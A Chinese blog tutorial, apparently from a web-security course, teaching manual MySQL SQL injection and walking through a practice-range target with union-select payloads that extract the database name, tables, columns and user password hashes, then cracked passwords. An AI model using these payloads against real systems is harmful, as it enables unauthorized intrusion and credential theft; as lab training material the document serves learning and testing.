第12天-Web漏洞——SQL注入之简易sql注入

SQL注入

SQL注入就是一种通过操作输入来修改后台SQL语句达到代码执行进行攻击目的的技术

sql注入产生原因

接收数据 拼接数据 数据库执行 结果展示— 四个步骤,过程中处理不当就可能会存在注入漏洞

sql注入漏洞,取决于过滤严谨与否,过滤严谨,基本不可能存在sql注入漏洞,反之,就可能存在!

SQL注入的危害

1.危害数据库里的数据

2.直接危害网站的权限

SQL 注入知识结构

在这里插入图片描述

mysql数据库注入

在这里插入图片描述

mysql数据库

数据库A=网站A=数据库用户A
表名——> 列名 ——> 数据(目标)

数据库B=网站B=数据库用户B

数据库C=网站C=数据库用户C

如何判定是否存在注入点?

老办法:

and 1=1 页面正常

and 1=2 页面异常

原理:

SELECT * FROM users WHERE id=1 LIMIT 0,1

SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 正常

SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 错误

逻辑运算(与 或 非)

真 且 真 = 真

真 且 假 = 假

真 或 假 = 真

SELECT * FROM users WHERE id=1 真

and(且) 1=1 真 =真

and(且) 1=2 假 =假

不要局限于此

SELECT * FROM users WHERE id=1xxxx(随意、怎么舒服怎么来!) LIMIT 0,1

随意输入内容后

对网页有影响说明带入数据库进行查询 有注入点。

对网页没有影响说明没有带入数据库查询

出现404(或者其他、如:跳转主页)说明对输入进行检测 基本没有sql漏洞

猜测列名数量(字段数)

order by x(数字-不断尝试)

正常值 网页正常显示

错误值 错误网页报错

信息收集:

数据库版本:version()

数据库名字:database()

数据库用户:user()

操作系统: @@version_compile_os

视频中出现的题目

1.可能存在注入的编号选项有哪几个?
1-www.xiaodi8.com/index.php?id=8
2-www.xiaodi8.com/?id=10
3-www.xiaodi8.com/?id=10&x=1
4-www.xiaodi8.com/index.php(post注入)

答案:1234

2.参数有x注入,以下哪个注入测试正确
A.www.xiaodi8.com/new/php?y=1 and 1=1&x=2
B.www.xiaodi8.com/new/php?y=1&x=2 and 1=1
C.www.xiaodi8.com/new/php?y=1 and 1=1 & x=2 and 1=1
D.www.xiaodi8.com/new/php?xx=1 and 1=1&xxx=2 and 1=1

答案:BC

墨者靶机真实 MYSQL 注入实现

SQL手工注入漏洞测试(MySQL数据库)SQL注入_在线靶场

?id=1 and 1=1 显示正常

在这里插入图片描述

?id=1 and 1=2 显示异常
在这里插入图片描述

判断存在注入点

order by x 尝试判断列名数

order by 6

在这里插入图片描述

order by 5 显示同6

order by 4 有显示变化

在这里插入图片描述

id=-1 union select 1,2,3,4

在这里插入图片描述

发现回显点应该在3上

id=-1 union select 1,2,version(),4

在这里插入图片描述

id=-1 union select 1,2,database(),4

在这里插入图片描述

id=-1 union select 1,2,user(),4

在这里插入图片描述

id=-1 union select 1,2,@@version_compile_os,4

在这里插入图片描述

信息收集:

数据库版本:version() 5.7.22-0ubuntu0.16.04.1

数据库名字:database() mozhe_Discuz_StormGroup

数据库用户:user() root@localhost

操作系统:@@version_compile_os Linux

已知数据库名 mozhe_Discuz_StormGroup

下一步,查看表名

219.153.49.228:46695/new_list.php?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=%27mozhe_Discuz_StormGroup%27

在这里插入图片描述

得到表名:StormGroup_member,notice

http://219.153.49.228:46695/new_list.php?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=‘StormGroup_member’

在这里插入图片描述

得到列名:id,name,password,status ,查询 name password

http://219.153.49.228:46695/new_list.php?id=-1 union select 1,2,group_concat(name,“10086”,password),4 from StormGroup_member

在这里插入图片描述

mozhe10086356f589a7df439f6f744ff19bb8092c0,mozhe10086b46338541e2cdce28687c89c029cfc7a

根据题目提示

在这里插入图片描述

密码应该是经过MD5加密过

356f589a7df439f6f744ff19bb8092c0---------->dsan13

b46338541e2cdce28687c89c029cfc7a-------->607466

两个账号密码

mozhe dsan13

mozhe 607466

尝试登录获取key

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值